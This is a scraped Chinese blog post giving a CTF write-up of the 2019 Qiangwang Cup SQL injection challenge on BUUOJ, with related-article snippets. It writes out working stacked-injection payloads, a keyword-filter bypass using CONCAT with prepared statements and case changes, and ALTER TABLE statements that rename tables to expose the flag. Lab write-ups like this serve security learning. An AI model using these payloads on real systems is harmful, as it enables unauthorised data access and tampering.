第三题——[强网杯 2019]随便注

最新推荐文章于 2023-02-15 15:49:39 发布
最新推荐文章于 2023-02-15 15:49:39 发布
阅读量169 收藏
点赞数
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/115353583
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,一个输入栏,通过题目可知是sql注入攻击

在这里插入图片描述

第二步:测试SQL语句

输入1' or 1=1 #,出现了当前表中的所有数据
在这里插入图片描述

第三步:使用堆叠注入查看表名

  1. 输入1';show tables;查看所有的表,发现有两个表,一个是words表,另一个是1919810931114514表。
    在这里插入图片描述

  2. 输入1';desc words#查看words表里的内容,里面有id,data两栏。
    在这里插入图片描述

  3. 输入1';desc1919810931114514#查看1919810931114514表里的内容,有我们想要的flag。
    在这里插入图片描述

第四步:使用select取得flag

输入1';select * from '1919810931114514';取得表中的flag,发现被拦截,从拦截提示中发现过滤了select,update等函数。
在这里插入图片描述

第五步:使用预编译绕过select限制

输入1';set @sql = CONCAT('se','lect * from '1919810931114514';');prepare stmt from @sql;EXECUTE stmt;#查看flag.

-1';
set @sql = CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
EXECUTE stmt;
#

发现还是被拦截
在这里插入图片描述

查看提示发现使用strstr函数进行拦截,由于strstr不能区分大小写,将刚才的输入改为大写开头
等价于1';Set @sql = CONCAT('se','lect * from '1919810931114514';');Prepare stmt from @sql;EXECUTE stmt;#,提价后得到flag:flag{89c5d790-b14d-4661-9fdf-4aa4e41188ff}
在这里插入图片描述

思路二

在第三步查看表的字段信息时发现,在输入栏输入1' or 1=1 #会显示words表里的所有信息,猜测默认执行语句时指定的是words表,我们可以通过修改表明的方式,将1919810931114514表的名字修改为words,之后执行1' or 1=1 #就可以看到flag了。

修改表名

原理

修改表名(将表名user改为users)
alter table user rename to users;

修改列名(将字段名username改为name)
alter table users change uesrname name varchar(30);

具体语句

1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

拆分开来如下
1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);
#

查询flag

输入1' or 1=1 #就可以看到flag了
在这里插入图片描述

堆叠注入原理

堆叠注入,顾名思义,就是将语句堆叠在一起进行查询
原理很简单,mysql_multi_query() 支持多条sql语句同时执行,就是个;分隔,成堆的执行sql语句
eg:select * from users;show databases;

想学习安全的小白
关注
专栏目录
CTF-Web-SQL
beihai2013
01-26 3337
目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便 目来源:强网杯2019 目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠入,sql的show语句,sql的预编译,sql修改表 参考:https:/
XCTF目 supersqli 的做思路
daqiangdetianxia的博客
07-06 516
在输入框提交后浏览器自动进行URL编码。若在hackbar中,则需要手动进行URL编码。 尝试: 1’ – 显示结果 于是修改为 1’# 显示: 正常情况下输入 一: 1 二: 1' and 1=1 三: 1'and 1=2 若一、二、三都为真,则存在入点。 经测试,存在入点。 然后 通过order by测试一共有多少列。 经过测试,一共又两列。 然后输入1' union select database(),user() # 显示: 发现对selec
[强网杯 2019]随便
Is_Linmouren的博客
09-25 170
[强网杯 2019]随便 知识点 堆叠入 尝试了一下单引号闭合;存在堆叠入;过滤了 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);右键看源码有一个释 <!-- sqlmap是没有灵魂的 --> 于是试了下sqlmap,可以跑出数据库跑不出表; 动手:payload:`1’;show database;show tables; array(2) { [0]=> stri
攻防世界web高手进阶区(二)
weixin_44866139的博客
03-17 627
supersqli 目提示随便住,输入1’目报错说多了一个分号,存在sql入 输入1’#,返回正确 1’ order by 2# 1’ order by 3#,返回错误,说明有两列 联合查询,发现select字段被过滤了 当关键字被过滤时可以尝试堆叠入 方法一:堆叠入 -1’;show tables#,–+好像被过滤了 1、查看字段 -1’;show columns from 1919...
第三次作业:穷举——木料截取.c
09-22
第三次作业:穷举——木料截取.c
高考必刷——真分类集训(2015-2019)——生物(答案及解析)
01-21
本文档属于学习类文档,有需要的朋友可以自助下载。
2020年TI杯电子设计大赛F和2022年山西省电子设计大赛E——简易非接触
最新发布
10-28
2020年TI杯电子设计大赛F和2022年山西省电子设计大赛E——简易非接触式温度测量和身份识别装置的总体思路和代码——简易非触点温度测量和体温识别装置。本问使用GY906DCI(测量范围1米)红外测温模块
三年级上册语文试2019——2020学年度小学第一学期期末测试(卷)含答案部编版.pdf
10-13
三年级上册语文试2019——2020学年度小学第一学期期末测试(卷)含答案部编版.pdf
2022高考二轮复习英语 第三节 词句猜测——胆大心细 .pdf
03-03
2022高考二轮复习英语 第三节 词句猜测——胆大心细 .pdf
buuctfwebwp详解及知识整理----【网鼎杯】随便(sql入)
weixin_45784586的博客
02-09 1024
最近一直在学sql入 尝试练练ctf中的sql入,因为自己自动化工具还是不太会玩,所以选择一些纯手工入的在这里插入代码片 自己走过的路加wp指导的心路历程 0x01 入检测 1' 报错 1'# 正常 1' or 1=1#正常,表中所有数据显露 1' and 1=2#报错 1' and 1=1#正常 可以得知存在入 0x02 尝试获得该表中的列数 1' order by 1# 通...
攻防世界 supersqli 解思路
xj28555的博客
07-14 1551
随便,初步判断是有入点的,那我们进入目 提交一个1试一试 再在1的后面加个单引号试一试 报错了,然后我们判断有几个字段。 回车后正常,但是换成3后就报错了,所以有两个字段。 当我想用联合查询查询用户和数据库的时候 爆出一段正则表达式,发现过滤掉了图中的关键字。然后我寻找绕过点,发现了堆叠入。 查询表 查询字段 发现flag,然后我们想办法读取flag值。因为select被正则表达式给过滤掉了,所以这里我们就要想一点骚姿势了。刚开始我想..
buuctf-web-[强网杯 2019]随便1
mlws1900的博客
07-29 186
思路是把1919810931114514表改名为words表,把属性名flag改为id,然后用1’or1=1;#显示flag出来。下面的方法我也是看其他wp才知道的,因为之前判断列数时为两列,所以只能查words表,不能查1919810931114514。1919810931114514和words,分别查看内容。把1919810931114514改为words。1919810931114514存在flag。把flag属性变为varchar类型。判断是否有入点(没有咋做)......
BUUCTF-练习场-WEB-第一部分(8道)
weixin_45908624的博客
02-15 2096
BUUCTF-WEB 8道
【BUUCTF】Web
xuanyulevel6的博客
08-08 5514
【BUUCTF】Web
一天一道CTF 第三天(堆叠入改表名)
scrawman的博客
03-02 450
[强网杯 2019]随便 今天的也是SQL入,输入1'报错显示说明闭合符号是' 再随便试试-1’ union select 1,2,3 --+,回显return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); preg_match本来的作用是一个匹配函数,也就是在我们输入的语句中查找是否存在select等关键词,i表示大小写不敏感,无法用大小写混搭来绕过。 在网上查了一下可以用堆叠入,1';show databa
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
强网杯 2019]随便 【SQL入】四种解法
weixin_38832257的博客
08-17 1769
目简介 目名称:[强网杯 2019]随便 1 目平台:BUUCTF 目类型:Web 考察知识点: SQL入 解步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1,测试一下是否存在sql入。 提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
《软件工程——理论与实践》课后习及答案解析
"《软件工程——理论与实践》是一本探讨软件工程理论与实践的教材,其中包含了课后习及答案,适用于考试复习。该资料涵盖了选择、判断和简答,涉及软件工程的核心概念和方法。" 在软件工程领域,了解并掌握...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值